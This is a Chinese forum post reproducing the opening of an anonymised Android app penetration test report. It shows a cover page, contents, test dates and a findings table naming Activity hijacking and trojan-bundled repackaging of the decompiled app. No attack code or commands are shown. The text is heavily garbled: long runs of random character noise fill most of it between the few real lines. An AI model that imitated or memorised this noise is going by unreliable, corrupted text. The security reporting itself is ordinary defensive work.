找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4387|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
: ^; d/ u4 y3 Y5 M, U ! ~) v5 d) v7 x0 _ e0 c

! m* M* `' _3 P% C 9 T5 P% J2 G9 \
3 Q( [/ R- J; a! N! s8 u( c& t! A 4 I( P& J& h' c0 |/ ^

/ v1 [2 x4 \9 ~0 }( f* u9 z2 c 9 N h+ I0 j. p* g! O( M
1 g5 E3 ^. J$ _( Q. x. C2 X 3 Z& y8 F4 r# E1 Y

3 y: f8 M! ?3 w$ | & I' [* o- g* b: u4 H 文档编号:                # E0 B, U. I9 T+ d' s! i2 Y7 n: f- ^

" q- W. g% B; `1 q+ C; Y 7 Z( G {6 {. S3 o

6 F! O3 [& Z$ k' c " e/ f# }% ]: @' O# d9 ^) ?4 p. Y   6 g/ P( \; |' _: w* L4 d; ]- |- p8 H" d% X# W5 v' v

1 o- h% k( l) P0 ] # S1 a3 [ k0 h7 o: E. m3 s7 d

1 H; q7 s' Y* i) e5 y, W! N+ Y" D7 M4 @( s   & G& w+ b) O U ; t+ p* b& W$ L4 |" z

9 _0 u, ] w' {9 D: o* @ ) ]! X8 v2 i( W9 y

9 x0 l+ ?, ^3 a# ?% w4 ] 3 {" K2 Y* {" i5 m5 `   ! F8 o; N2 B' t0 Z0 V6 S ) D6 h: F* N4 V, ^2 c- g# k

1 S: N/ m* o6 n; @6 g# f ( P$ x3 k" W5 ~5 A! l8 X

8 z* p+ t) L2 {6 C& I% e / n5 F4 z5 U, q; R- Y   7 ]$ b9 q- l! y0 L! D% R4 P: Y3 N* r - O& u1 U T& B+ {& ?

! t# u0 _. m' F. j- r& T 0 B1 \5 z/ L- V; b5 g- }& A. P

+ \6 g5 J: F/ Z3 ?# P. e : \. \7 z; Z4 e: B   4 Q6 b, x3 J3 s # k2 W2 e6 N' x$ J3 y( @, Q) y4 o/ Y

/ W) \$ q! {/ G8 u* T # d2 V' f, k* b2 Y2 d& L

5 D' F# E$ e: p$ H2 _# l) o9 X 2 L1 [2 u( Y6 k# `$ A s4 V+ J 某某某APP渗透测试 7 N4 z; d2 q+ H) B; |( ] [ : |4 b7 w, S* G

& b, v& \6 h" a c/ o8 K% _9 o6 d0 P- @- Y$ E/ N5 A! H! X' R

/ J |' [8 ^7 ?/ {) V! ?6 I 0 Z r) q. V. l/ @/ c9 B4 x   6 F# B( P# y7 ~ 1 x5 z; L0 Y: e2 ~+ F+ Q

. V, t5 ] S; R8 l9 e9 }& c " Z N+ l- Q. V

y8 _: m# A& q+ Q& w, T, K$ {3 m+ E/ }$ j. o5 i   5 C+ V8 M1 j7 I( s8 n 9 W8 k; n! [+ s8 n( T

" {& U6 G5 \% [ Q" ^ # ^4 ]1 O' q3 _# y: A

+ S2 ~$ |- {+ l- ?! m k! V% @, j 1 T' i( F% g; j8 c! X3 W   7 \* a4 l! B0 s0 U* M ) q- K4 E1 }! t

3 J9 S# h* f+ U; ]3 T ' H3 _; F( s- j; G$ l3 G& k

& q& t4 l( ^; j; L3 C& U % l3 X9 m1 z* Y( g% }$ F   8 O2 i/ o# [1 Y6 e' [& ] T% ~! M8 z* C- I" K

: c0 v0 z! K9 B+ U7 B3 Z9 d/ }" p4 I, ]% Q( U

/ s" N8 C3 E) r/ O & Q! D1 D+ b1 Z: ^; h. A( Z 技 术 报 告 + y5 J) R( r6 [; d; A7 o& U; Z5 d- ` o. ^& g% P

% f; y$ s8 j0 b+ u2 v' P7 ?9 S" \8 H6 ?! A

$ t4 q% d( A5 C / k6 H# C' ^$ j7 G0 S! }   1 b7 l/ r; |( r9 c) }* g6 l ! R; d6 |4 [; d) ]+ k

# Z+ E2 K: r. a( M9 k : V( P# X' }/ ?# _( C

6 c' L/ O& e+ k3 V/ k Y! ~% ` * B. P2 D8 r! V% f( @5 d6 ?) x   p; F- _! @" G- B, [1 Y % g3 z9 \5 e4 V& N

; N( B0 U' Q0 c6 z1 b% o* C7 M- r, Y' q4 J- {* Q9 t

9 u* C! J+ ` U2 K- ~7 p2 ?' M( d3 J! I6 y) t   2 @1 y- t6 c. {* q$ y i & P$ M% O/ r5 Z3 s7 k/ ?$ D

- G& x; K# ~# f q2 w d+ U$ f5 f' F) _& U8 w! ~- F7 y

, D6 M2 K# r. r " z! G' t6 a/ b" k   " X4 I" a& r3 c; x( m* @ 7 s m* p. i% o9 ~

1 ]& Z& C7 C) N$ `; a& m 3 Z. N9 V- ^/ h' p- H' r

; ~& o$ d$ M1 E; J$ R7 P1 Y" L. a; Q# H' i: E   7 N8 Z1 _ B/ E/ @- a/ ~ 7 J e3 P) n' u: C3 a W

4 K, v+ ~# _6 o; ^# V, v( T, r0 m+ f1 v" _5 R

$ G+ k6 t( W' l! _% S4 q ; T+ k1 C/ h/ P0 _   & t. o8 |9 K# v4 r6 c( }; @" j" J2 l

) A& @3 |& V9 _8 J6 h- n . I/ J4 h' L% t* w. ]9 l1 \0 x0 R

1 o/ d; h+ a& G/ ]* F& F( L F0 {: @; k. C/ P; Y6 J% _   # u P: l0 k& v3 Q2 x# L/ G% C: |: H q4 Y) I1 z% B

' {" D3 h- c, y }5 ~ 0 M0 v; J& O, F7 \2 s) B

- v7 J% b, n1 f1 z / ?7 m7 E6 ]. C   6 W2 F8 {8 O* ]% Z$ T# P4 P " ^1 \9 w% B( q& R* z

; Q; d; M3 t4 }3 e 1 @& Y! a9 N( B' A; w& v, [

% }/ Z# y( C4 z+ b) @/ v4 Y1 q* S4 T( K+ z( |   3 }* w' B) o) o ' P5 t& m6 M. }4 H) E+ a" i

5 T0 D* B- A5 B; n9 e! \, @ 3 v) F$ s; g9 U5 K# J* |* K, |

$ s0 C4 P2 m, @1 [9 T1 D' Y% f# E , V8 Q7 b' O) Y2 B0 P' G0 v   . Z/ w5 n& f) h% n, k2 O) J* A - g0 P# `) m" k8 r

5 m+ k4 Z" H& B5 n1 u6 M - b" e x1 {0 ~0 R4 V( M7 _+ B

" _- V7 ?1 z/ F/ |) ?; W - y+ e+ s) r. Y# l; G   2 ^2 x7 Y, X% M& s. ~2 q! F . i# F: X1 V+ r. N% ]3 O

6 A5 b# v4 C7 |/ F: M) D# J% Z% t0 V J, q+ R

: _- q% p3 Z3 G/ T8 ^* x! g' `2 ~' S) X   3 l; t$ V3 n: I- s9 d5 F+ O 0 g/ F8 ]/ m1 C( l

- v# I! X% V2 `" k) Z7 C/ B6 k# h% s- n " T3 P1 R' _; l) V3 H

7 r% x3 v! [1 m O: W9 U ; A6 z7 Q' F T+ a   9 a& d& S' M( c/ r' E/ S( ]& a0 N + i u% ]7 J* X) A) o

! c, x$ H0 h& A* N3 S! B6 p" ^( l Q8 v; S$ u. P: z

% I- S. o: T* h% m 9 T* E2 B& [+ k. T' }; ]# X, \; a0 F   ; Z- y4 @6 A# d) Z2 k+ y / e3 i# w2 Q, M1 F

" O( g" A( W: u) W' w8 C8 ~6 W% S1 L* E" J$ e1 ]) t3 s# M \

! U$ \ Y# N; H$ |8 I/ V! }" E/ s, U! W5 j1 S1 n f   2 J( N A9 J( ?$ x& u. z , T3 C' Q8 ?1 C* l8 E* [+ {! T

" t5 |/ ^' x/ F! l/ _ M! r" j3 t, Y. P5 F( d9 z4 V* z8 I

' x& H8 S/ Z& p 7 D( f% Y5 d1 z- @   + S0 Y# `4 L& Z: F+ F+ H ; B. ?. m: L# W

! p4 j3 f' p+ p: h7 Y- U" u ! E5 q" X0 D1 l/ c

! _: q- B3 ~. v0 Y! M 2 n7 j- W! N& O! ^   2 v5 P% z& x5 {/ W& M, c ) A3 g/ D1 q6 ^' _+ _2 w+ X1 z

7 m7 y' h7 D; }. c6 b. q0 { 1 `% i- x4 w( e+ A

. ], W' U; X, } ^0 E5 @% H; {$ h7 H6 a4 R! z   ! v" t- ]% F0 g: @ ' c: r1 t( _. o, f- B. D7 e) s

' M% u" B6 j9 l* W. o6 D % F$ D) ^" T" ~; B

3 O5 \9 S9 x/ O. h2 f4 a5 z# B! r7 K; O5 T1 s% |6 @ 二〇二〇年 0 }% \' w5 H: C3 ? ' ^" q. v9 Y# {. h' m

$ }3 S4 Y! h. g( E z9 L+ T . B: B9 u- p1 R c& K
9 W" L% U3 c. a, C ! x1 G' O7 f8 r7 u% H: H
& N k- e( e3 X t; {( N9 p& m* }, {9 t 1 Q( k/ ] ?$ I5 P# m( u5 c+ K
7 e! S' m2 X9 }7 p4 g1 d0 [. p# N( [8 h
. H; S) B/ O* Q 7 V6 P4 F" c, y1 H4 Y6 V$ Y) D+ G
% Q4 S" m6 W7 p; ^, o5 J+ S7 G; q - f! S& p7 S% S' N; n
1 S' v, q: D! i * ^/ J: c- i( t: I* w2 D
5 g( ?) H T. p+ b1 d( E9 _5 ]* b ' w3 n, h/ [ K" q F# r# D
4 b; Y4 i, I2 `, _0 C( Y8 v7 {+ }+ Y % j4 j5 V+ n8 I

7 h4 N4 q% u/ H) J . b" y5 z/ Q0 n* X 目 录 % [1 K1 ?7 E/ ^ |$ h8 k % S, A: b* Q7 \; Y3 ]

' t+ L2 K3 e4 i + p8 u3 K! w- i8 B0 p, o2 M% ^5 ~& j ! [& f, F7 @1 b ' ^: `$ v/ `4 k# A% e" f; k, V% R( [

4 d( Q( g' e4 O; D+ P; {8 @$ i" [; Q. C7 U) y   3 Q; B# M, t5 `2 Z( G% L " k |/ N H" V; H3 E0 P3 L# K

4 o* ^9 X v9 P' [ ! U- ?) e0 D( b2 |+ ?

2 r: b$ s" ?% S / w: D7 ^: T* Z& p9 x- Z3 B o 1 概述... 3 ! k3 A4 K& Y0 M- D$ h ) ?, m1 |3 G2 H' O0 i

0 w& \: t' S' R/ X 0 G6 }; p# t) L4 u

( j( U g' R u `7 Y* p+ N3 Q/ b9 V4 Q: z0 V 1.2测试时间... 3 & C B6 d. B1 g0 U 5 C n6 p/ V! N6 @) a

2 q3 h a' f& O( V- M 1 E- E( _, a' J2 g3 l( S

3 C. C$ Y: m% Q' ], X # m( t# c/ c7 u/ S/ o& c' }8 E 1.3测试对象... 3 7 e+ t9 T% Y1 f) p {4 |7 Y7 I & f, K/ ^+ h/ ]- V& u! n2 r$ i/ M

. y) z0 @1 E Z) D: ?0 X" c7 L% W; g

: U% Z) x3 {; F ' m* W z( j$ f& { 1.4测试结果... 3 8 q5 S3 |; `* g' x. |6 R 4 w2 U0 q7 Q4 O6 P; i

$ {8 s4 v8 J0 U# x: [3 \% [* p# L7 u& i

( K# |. s2 P; ~4 [- ]( U# P, w1 q& u [+ M, R+ {( M' E 2 检测结果... 4 * ~7 }7 R, N5 f7 M$ b3 e5 G, _ 9 }+ s/ u' s3 A

1 ^- C9 E9 f( J' z) W! i ( ?4 G- }+ r& ^8 ]$ A a; p

! x, D) c- k0 ~' z2 k0 h" X N8 k6 T/ y3 |8 b/ n 2.1 某某某... 4 ! M# P& _ w. l* D; g+ ]; f* J* j 6 V% z4 ^1 e# w- I. `; p

- p e7 I, R1 p$ ]! y/ k4 D- R( r% ? y9 |

# `+ S n- y( `2 {2 ~+ K' B8 q" {% s4 m- |, t# {4 o3 Y 2.1.1检测目标... 4 / ^$ e- V3 t& j6 {& G 4 g( k! _& s+ o* k

$ ?- F, _9 E" C( b8 g, u) o/ O5 _* b

: c! H6 Z1 q( G9 z7 e- p/ n : [. E# Q/ m" w3 R/ w 2.1.2检测结果... 4 5 o Q) m& s$ l# ] & g, Y4 b/ G6 V; Q. B

3 H7 N% h: ]" g; R; ^$ }' r# S, h1 F& b% z! h- r; T6 ?

" \' f. S! U$ A f3 L0 P: A. R n- w3 K! J/ t% w 2.1.2.1. 4 ( B. ~4 Z$ L! E- m3 }9 y! F, a 4 L8 ~- \! v) A, O- L# }0 h

8 p$ {! l7 }) e) M0 O4 _6 Q3 g! S0 N/ D9 i+ Z

9 u R2 T B# m4 y2 x# {9 } ; N0 v1 T% m8 W0 ^2 Q' ` 2.1.2.2. 6 % c" F9 U( o' W* S7 o 2 o7 I |$ u+ d1 T, b1 j% i

4 m- x% ~ ^( I% s/ O . N2 d$ q! u7 e

2 I0 R# a" W+ y" K# o, r) f . Q O2 g5 z1 U7 g& @ } ) Z" G4 ~4 _1 x / o) e) E. _8 N7 @* p

4 e9 H0 ?( b- Y9 U$ z) e4 F 0 Y& R4 S$ u* \$ m
6 e5 d: S* l' e1 T% \. m 7 w/ P% v' }5 c3 n$ q
9 m o: W) _% X+ \% r4 `! t * y6 x* N4 ]! e( U& p1 k0 p$ D) S
7 a3 V& q( m. s5 j 5 Q8 C. i0 O: l. |+ C" X+ ^% M* H
; j0 _" H- [& k6 I ( k7 z% M D6 e' M1 f$ ^5 D

( L9 p8 h0 H6 b6 E3 l; p0 p! R. ~3 L: H8 n* A 1 概述 ; [5 _% A8 n0 h+ J; S2 O % z1 F3 e! ^) K8 I4 k

; ?! P: p* s5 z8 p3 J / r; ]; H3 @4 b F7 P1 \

) v; p/ T9 F( c g- |! y6 ^. R + d. u! `: w1 X; d' S* W; t 1.2测试时间 D5 g9 B' h; `" c $ n, j% b7 a& }2 M( ~+ _

- U) L- J1 @3 s! a. J 8 F# f$ I9 Q( Q. {" @ 1 `0 J/ f5 n& m6 w$ B% s, g; b V4 l2 f4 @- K1 D4 F) \% ]3 _: J( \: s' L0 }& d9 v# L L4 `0 K6 R$ d' P: Q$ b4 L$ Q; E3 w6 C8 W3 A1 X; z# J& a: e$ u" U' V" {; l# V8 n3 [# b+ ~6 T7 z: e) u; D& o9 \8 m+ N5 X4 w1 N+ h2 ^2 P, k/ T3 C% L; K% z2 v4 D/ e+ e+ m$ d) `5 a( D6 O: x) d1 w; [! i K. h1 f, D, b* A5 r3 e: e! _, P7 Z% m5 M& ^! @, ^2 D4 q. I5 h" z9 e- |6 s/ P9 M7 w; ]" N9 L4 |+ Z; U) C' v* X$ }8 X/ k/ C& s; F/ e9 H% d7 H0 e: [/ R% Q2 g. u8 U; ^1 ]) P3 a+ |6 S V/ c! I: s7 ~: [$ Y8 L( P. _9 y1 \8 e' g$ `* ?$ k8 n+ p0 p8 c8 O/ o% C# k; R3 [; s0 f3 d! R; H- v/ N* S- o) _% z$ P4 s+ y$ y& ], }. Q/ E! T, e- ?+ g, M8 u' {: ?- ^- l9 A# n( |- M. q' D4 c
0 O$ E3 _+ d D+ }2 [ @ : R9 Z8 g! _' f5 D1 G. |

1 {* [8 w5 b6 F, O8 Z 6 ^8 q! o( \% i1 ^& o2 D2 W3 \/ h2 o 渗透测试时间 & S# h: r: c. z- E( X 5 ^3 X4 l* g7 U1 y( A

& D, b- d0 O9 u) P% r& o0 K1 e) l5 q* K) V! O. B, @
$ q& |7 p2 i) G9 M! h$ I 2 d4 C; p6 p0 e3 Q+ p- }# f1 E4 D

% ^ j& T0 e* U( z 5 T9 {; ?& H% K 起始时间 & @, d; x. l" w3 t ! e( h |( C4 O' z( q; v" _2 i

U* X" l. J4 G# X 6 O; O6 ^, }5 ?8 g/ v6 ]
$ g m @# @$ J0 n6 c ' x( q) m+ G$ |0 |

4 r( y! X" ^. ^& \ 8 e1 q' t2 x w. N8 E7 E! K 202046 / H# E1 @# N" ?2 r$ d/ b, U4 \! o n- p

( J4 R2 U/ e! D' X# M, c- u; A 5 n- x! d. @1 f2 O# Z
# |/ K$ } r! b8 b. g! f8 `) O- |4 H

6 B+ C3 a e9 A8 |5 l ) Y+ T/ U1 z- ~- w 结束时间 + V. V# J3 E& ]; b2 i % a+ u n9 C+ I0 s" ]

$ W8 r7 V$ L; I: x9 O* x) E4 Z1 P! ]; q0 s& G, y0 o+ [) B% v
. _8 m( [' p% V; I! ?2 _: e& _; ]5 ]# f- ^2 F! D9 z. z! ^

) P6 t# \8 t6 n) F* R/ i3 Y 2 G6 \ E* @9 n5 h 202049 9 u6 y4 n9 Y& b- {4 B" U9 ~8 z3 a. P# F5 O# o/ J

' K/ U% J8 ~- g# H & C9 X# l* B3 B, p1 g4 W- F
4 p6 _9 N. x& v8 Y! t/ m) H 4 D& u4 m/ ^9 ]7 h, B0 L( s2 H

+ S; u4 s( h( o2 o- E& o! a; {( F5 _+ J/ o" B0 y6 V X; S( W+ Z# j5 }4 H 1.3测试对象 ' \ |! ~7 d) U$ Y8 s ! H5 U, O0 M% P+ p/ [0 I4 P

$ O; ~4 x F- ~* W s r1 U& a" w: f4 Y( q9 P# [

) O: V7 @- X* j 3 }+ L. f3 k/ I7 L! W 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ! ^9 j: r6 o: G+ s ) S( j! P, w) l P) s) |

1 o$ R5 P4 U1 h. Y( ~' A o$ J( j: s. r9 s9 X

0 i5 W9 E1 _% j8 Q: }# X; U ) P5 K% k" m2 T. Y. u 1-1 检测对象 0 S1 |8 x( X* \ $ X) T5 w' U! M

1 J. P/ f9 ~, ~. ?2 M+ Z1 t/ z1 q2 q# o; l% r& [( w# } 9 B2 q6 y! ^7 I, N6 e/ o: h8 |; v% {! K4 m+ [1 w$ ?) j7 h3 X A5 O6 l9 u! Y @( a+ X( `! b- t) C8 y: B6 ^+ @# L- s3 k1 S) J- T9 ^* @* S/ ~* `9 y0 z# B3 w' V: b9 W% F- v2 w# O3 t+ t" r! o2 d4 g, v$ k: o z) |* ?7 S0 R: J& y/ _( R6 i: X8 H; a3 }6 ?* p" ?7 A% r$ i& L+ }6 o7 s7 v0 @& d2 y3 x' X4 @( X/ k7 D3 ~3 G) X# f5 R' P) F1 b- \, v6 V7 y2 n; D& T& i' ^# `) n+ s4 }0 h% h- m* m7 Z6 J: ^4 H* t& j* S6 o9 \/ l( h. E3 [/ }; m1 H2 y/ v0 n# y" l# U2 L: t- s7 m7 Z X/ R/ B/ {' \5 S, k! U' d7 b5 x0 p& k. o) Y+ `9 t3 O+ K; H( U, \& r8 k) x" \5 D7 B1 h9 H+ J$ [; K/ E) o- v! S) z, O$ P- `1 `9 o. c. J. W, [; I5 L4 p$ D0 N; e& c/ H6 w7 j) {6 l4 B1 @( K3 X: ]- F/ _! }: y% j. T% t6 e! p, z7 H6 H6 `& _6 Y1 }4 M1 e5 A6 G0 i0 l0 Q& {5 P: c7 s( h# E0 a4 r- P4 |. ^, a1 l$ O5 n# l4 Z3 [$ J) L; {
: y. J) ^: k( Z / |; D6 u: |2 ?& s: M" k# F W

. F/ M& m' f. P) p4 w: ?) T5 f 6 e' M) O5 l P, l5 I3 N+ D6 Q4 F 序号 * a0 q7 U/ x4 e2 S$ \) z $ y; L2 m7 r, h1 U

* p/ h B3 N8 ^/ m; H$ n# G K% m' b6 k
! n* W+ `; r" |! d: r # b* f5 m2 L: |! Y/ z! d( O

) _7 P. \, R; ^' d * [9 R5 K9 U; j! k: |/ F 测试对象 8 K" a/ O! U* o + n5 d0 @5 t E0 _) h

- H1 s2 |4 T5 V9 O! ~8 T L 6 [4 W& o& E1 c' b4 }
3 S6 p% I$ y# u; z4 |2 f) Q1 B. L9 l* M

) T; N9 E( l; j+ G2 M' n. w6 x8 C/ d* M9 W; o: `( l( ^ 测试地址 # Z, }$ F8 Z: I; Y; | ( U4 |: P0 _% U/ L. p

0 k# Z' v2 H" ~& P. g0 t S: a5 v' `2 d5 s- b0 n0 o
' W" [) Z4 h% k" e . a$ }1 m( N0 u8 A

- V- c4 [. X2 |. c; ]) Q; e3 E 5 m3 J8 z, c5 q& T' } 安全漏洞 ) q* t' y; E0 ]$ l+ ` ' R. z. c3 D) U' V0 j

! k' |, f* O" D' p + g! v. [' c! g9 G! J
- i8 ` K& T! H, L- _ ; f4 C& T! L4 r% E; n

! e; s5 _. k+ l! w, [# M* t/ g + `5 X* _9 c! c( g 1 . Z- U6 K4 |" ` 0 }' ^9 u& ~: J# |9 x0 ^

0 y7 M9 M& j, l, q Y) u4 Z' a( q5 W
+ {1 u* U) p7 B: V+ d: E1 [# i + ~9 h# Z1 ^) f% J( q( S- i: r

; _( a) y5 ]" J& K( B3 g - l! U3 ]8 E! X5 [/ i 某某某安卓APP 0 j3 C. R6 V7 x; H. R6 n) M& x; z2 r8 |! D

% z9 s% D' L3 Z$ O# ]0 y. G5 ]4 k6 h( J
# ?* J/ [) u7 h0 f' [. o* S% F& Q% M! ^

# ^8 T$ J9 c0 s# ]8 S+ B6 P / M, s! G; {" m' O   + A6 P/ S) ^6 e$ w; [9 }8 n+ ]- l! N/ j2 C2 k! }" G9 I, q, n

9 r! X# m5 n+ E3 L/ h( o# H! A$ b 2 W$ v9 c% z% I& i: z
1 g+ z* s+ X- g8 r* u) A h0 O- C2 D2 I) H$ Q& y

* N! d" _7 F/ [4 ? m! [* b( y* u( |+ H 2 p% R, A |" \! Y+ T* v7 x " U$ F8 I* x: g

6 N v* X2 g* K0 {1 e, _ , A; J9 D! o- ~1 H. L; M( M* S, a
b$ ?$ m# G7 v0 R - \! I: ]: j5 P! M6 @/ P

: e1 F# l, K# _ S; L9 j2 K7 g; E' Z) d- H/ U8 W& u1 \ 1.4测试结果 ; j0 k% Y, N+ g' N& | ; m9 \( Z x( z+ ~

: `2 z5 j# h$ ]9 [2 @ , _ \7 l* B5 m8 N

# e! o Q V1 X+ ~" ~- D E 6 ~% N* D3 d; Z* `5 Y3 N 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 6 e( ?$ P* _6 i( v0 m ( [$ i& M8 \+ b

3 S, G# }' J3 D3 B. {) S4 o# c. m% D( Y4 C' w

3 R( u2 U# f4 j1 d- c! T; ] " _' Q# z" s/ b) R   " V% x7 x$ @% h+ J& R$ i( m E6 m- v. i- V$ h5 _: [* ]% [

/ L- n. s9 f& h; Z C7 }+ {* @) G: k% O3 r
. g. g& z$ L# s3 R; x/ w 9 o% Q$ N% U( w5 r9 ]6 Q . ^: B* N- X8 m3 b# a& [8 i+ n- l) }% K/ F' W- e% e( Z |# K) q( T* k F, n+ o- \( B4 V5 A+ z, @' e. B& o/ x; o3 `$ x6 f4 H- ~3 ~& e4 f* _* F, K5 h# Q4 V- z8 H' W0 w3 P1 _- e" Q* y, M. e) y2 V. L5 A( X( w; a" j6 j) _/ H3 x$ M j. e$ u: O" Q+ S2 s5 H$ g3 Z! ?$ O( ^4 f A# y/ k' Y" Z6 }7 O3 Q1 Y0 K5 Z9 _8 X" m0 a: V+ q; r7 W& ~" Z. h9 S7 a" Q1 t1 o) }3 z2 w9 O8 N- n: b; v7 S8 N7 l, ]5 V; d! H7 l& S8 j i( i% C+ b3 X( m; X4 P9 S: M( m; i3 O$ e5 M8 b4 ?9 L, C; X. @1 H1 `/ D6 J* n+ q8 O% M: t5 W( A$ D' H. H4 h+ G1 }2 ~, z/ k s9 b- A' H, e/ _4 [/ c+ X8 R% Q$ S2 q1 N) v7 l6 m$ m w/ @) s$ l2 L! s$ T1 V: H" i2 l4 }0 ^7 k2 U5 Q) \- q' ], I5 k, P& S& q6 Q7 A5 h2 S1 l$ [' X+ M. [, |6 Y6 c0 p" t& J k6 @# s+ V$ Z* G. ]* Z2 t' e4 M+ _ {& @ @% F1 l$ q& u& ~$ P0 J% e- R+ Q/ c( L, l3 e6 k% I3 r# C' q" O5 J# g r& d5 i- Q& r3 L8 V+ p, d9 S, x& [- x1 x' s) a S5 m" b1 ]6 e# ~: P1 l5 `8 a( U' \* S+ a/ P7 q9 c8 g5 @& l* e# u& s- v; f# E* N# N* Q5 V) I1 B! i5 P9 }" K4 B: u- t0 i( m' Z! w, j }7 l! P. h8 D* ~. T# B q) K2 ?# Q- h' R, ?6 f) Q+ M( ~; Z) c+ c4 l" p* l% U5 x1 M: `1 P" y. s/ z! ` F* T0 @. r+ D8 R n( [2 I1 M; l- p& `8 k. x) v J l. n" z
$ |$ d6 n& R3 M; T' o 0 w2 b# }) u* O- Z( r

3 [- k. H' U# C# ` * \( A1 n1 W# M J, y0 _/ \- R 序号 * y$ Z% `2 c8 \4 v: p: { + k0 [: r6 p) `

* h6 D p: I1 X3 t: d8 I& r$ L' _7 b3 s5 D
9 s3 j. t7 I8 Y 8 l; R' C' |8 `% @

/ x4 O7 |/ N' L! L( y & R" e! A* I0 }) u! Y7 q; R5 { 系统名称 7 N- Z1 o' |* ^0 \ ' [ A# B9 A8 ^7 i5 t* Q+ l

$ A1 v; P( J8 T/ X" d , j4 i: a5 `( C7 B! {, H! @
* _1 m& c. D }6 Z d- f9 s" j9 ~4 \9 f) i

- I2 _! c& b) o. Y. A$ _ . D( }. ^' g8 T+ o6 y% G/ |$ v 漏洞名称 - j f2 D( i1 N* s, N9 C3 z7 T% u7 }8 a0 ?4 F

) k. }6 p$ o$ x% M : h( U0 i1 w. f+ {, J
5 x2 {% _/ R( r s6 A2 X& ]/ Y9 k7 y2 `2 r

9 W: \" f8 I, I9 V% O d # Y- y2 C' ~- [ 漏洞危害 $ w5 S) i3 r/ U( K; ], b* D# A: K + d0 R5 M& N$ h0 n' M0 e

; @$ E; ]6 M+ v& D' \0 V* h 8 L$ N) K1 S6 [
/ v& l: w0 {2 m- Q ! c2 d" _: z: [2 {

6 b. _3 X, ]* I8 y2 L7 R; U M: t* H! B - H% _& G/ }' Q1 a 修复结果 x$ W( s5 F7 n( q+ s5 D9 l ( p/ c; B: s. j( I' l

% P( |# V# O! E# w" G0 R & G) ~4 a, _4 J2 u
2 f, `/ l1 T# ~ B F. F' \ # Q" |. v& u' y4 J( H

# `. n1 g* g; I4 F8 D5 }# }3 m2 d. b' G1 e 1 & H: G1 V; N0 t6 u % }+ @) I$ f1 w

- t9 h' t- R) O " m& C" y4 U" d5 g6 K9 F
: U& ?$ ?4 b- }" [ : \" w1 |" k3 Y2 {0 h/ f5 f' k

% }6 |- ]# f6 m1 r7 m 1 t V; a# j9 d) s# v- m! B 某某某某某某APP ' @0 Z) L- `; ~$ P 1 u x1 N4 P* F u% c

: B% D4 T! }, k, S% r, [ 1 T# m, F8 N: j$ _$ v
' V3 n) A5 k) x! d0 Q$ N) | 5 a/ K0 o! o3 n+ j5 O% X) \. v

: \ x: x8 K* Q; h; d6 ? 0 n7 _( C% ~) J1 \& t( ]+ X1 E Activity 劫持 * |' i4 p/ E# W' o- e3 X$ [8 B$ D - p: o- \& _# K( c6 t

+ _# M$ W7 d: X- @ 7 R7 e& h: A2 {6 {% @

. z% p* ]5 t! a : ^# `7 A |) f# f& _* k3 I   8 ~6 y& Q4 H! t# p9 y* \# x . {! z# d2 \7 G! G F! t3 G

+ u2 _3 L S0 \! ^# h" T 4 g/ a8 Y2 A2 }/ F& x2 G, V
9 ^) E6 Y& B; S; `; ?* G8 Q: P7 F6 f: z& m. [

- R% n I, r1 Y; e- R. N- x6 i ! R2 k( g# f- u; T" C* @ $ M* Y) H9 |$ M- a$ y% { : f3 {1 @, [" H% T; F

5 r$ t; i% p) q( E& d " ~! d4 @, B" {# [8 k* u2 z
% q5 ~1 b* j: H4 i' I 2 p6 y# e' M& M9 D

% X0 |& \5 \( C# a 9 G6 u: X, g0 }5 K, g" N& u2 h   ( R& |6 W/ O1 a% c: S5 v0 y2 v # ?) `, ~- j y7 D* R

, [4 x! a0 G N4 q9 [ 4 d U" S: l2 l9 G) M4 v, ~
2 t6 E3 l1 Q# y( r: f5 K; _ 2 ?) a: y- ?. ~2 E/ U5 i* A8 p# {

: e3 o* q7 L% i3 P 1 g! B3 u1 @5 h8 `" [ 2 + d1 d$ @. \5 \5 H! Z$ o4 X1 x o8 O! N9 ?& _

+ T5 O& D. V. t4 C4 d/ l ) ~4 z" l$ ]0 O- X( w4 o2 b
0 A- H) F* T8 K7 @) T5 k) L7 j ! {; h" u/ [2 p0 T% J

% V6 W+ i% T7 P" I( H; u. o% Y8 S 某某某某某某APP 9 e6 O0 ^- k9 J& B 5 R; g% t' c* R, |7 J( c

5 B5 G" ~) Z1 @: I6 b; S8 a / U$ \. s) B7 b* M0 J
0 ]- Y) V. R8 W9 Y! {- z# ] * e, N/ s( F1 [% H

: { n' c/ Z' n" ^$ [& |1 D3 t' c# @; j4 J$ \9 @ 反编译二次打包捆绑木马、篡改APP代码 / q5 j6 m" o$ H9 f; Y " Y0 ?& Q5 X" m# B& s; ^8 I7 \

) Z8 y( N+ g9 B( [# K ( r! d7 [8 [/ O _* O
6 i) s5 L8 O/ r: e2 E0 b- d: Q* R$ X( ^* e7 ]

7 b" S0 j ~: w# w, X: a+ v! V 6 L8 V, Z; X# V* } . R# i! I% @9 {+ A3 c# u" D , A3 V2 z3 [2 ^2 X. s1 N& X/ `

# B5 S* ^1 J3 f0 m( ~) |, [! K( n , O* B' z9 ~" ]
' h8 P# Y! S6 }! F# S; Q0 x) C: \$ ^) S, [$ w

" |. a% g! K! b& {$ k# z ' I+ Z% o ?# x9 i1 O$ n; g   1 n v+ J( b+ n 9 ]. Y, P+ t2 C, L6 b& y

1 h! u# V. b2 k) Q4 j1 n 0 i. O4 g5 W- ?4 S, [2 ?
. X' Y2 g* @9 j! V( m2 H ( ]* d; j% _9 B* X# x3 h& p& V
7 d; z3 b' A: {5 r4 _' O$ V / A7 J- [4 V' |. Q1 s( b

0 L* v2 z4 X2 o9 s. }& f0 H 0 ?1 O) `0 D" t" K$ a) G* }8 H   $ m2 R7 m; z" v" V" k9 V + P( O0 Q: [+ ]5 f: S

+ x7 I- e, B: m' Z. Q, V0 W. ` 6 ^$ X; v: y/ a3 h* k1 D

$ G( \- _& s7 I ) o3 a) N, r7 M9 Q 1-2 测试结果 6 Y$ {% K( ^; R$ U/ p8 j, X( J# ]0 M* v7 d A5 a M

/ f, T/ e; Q u) \4 ]% @+ `, F# [; T% Z1 O

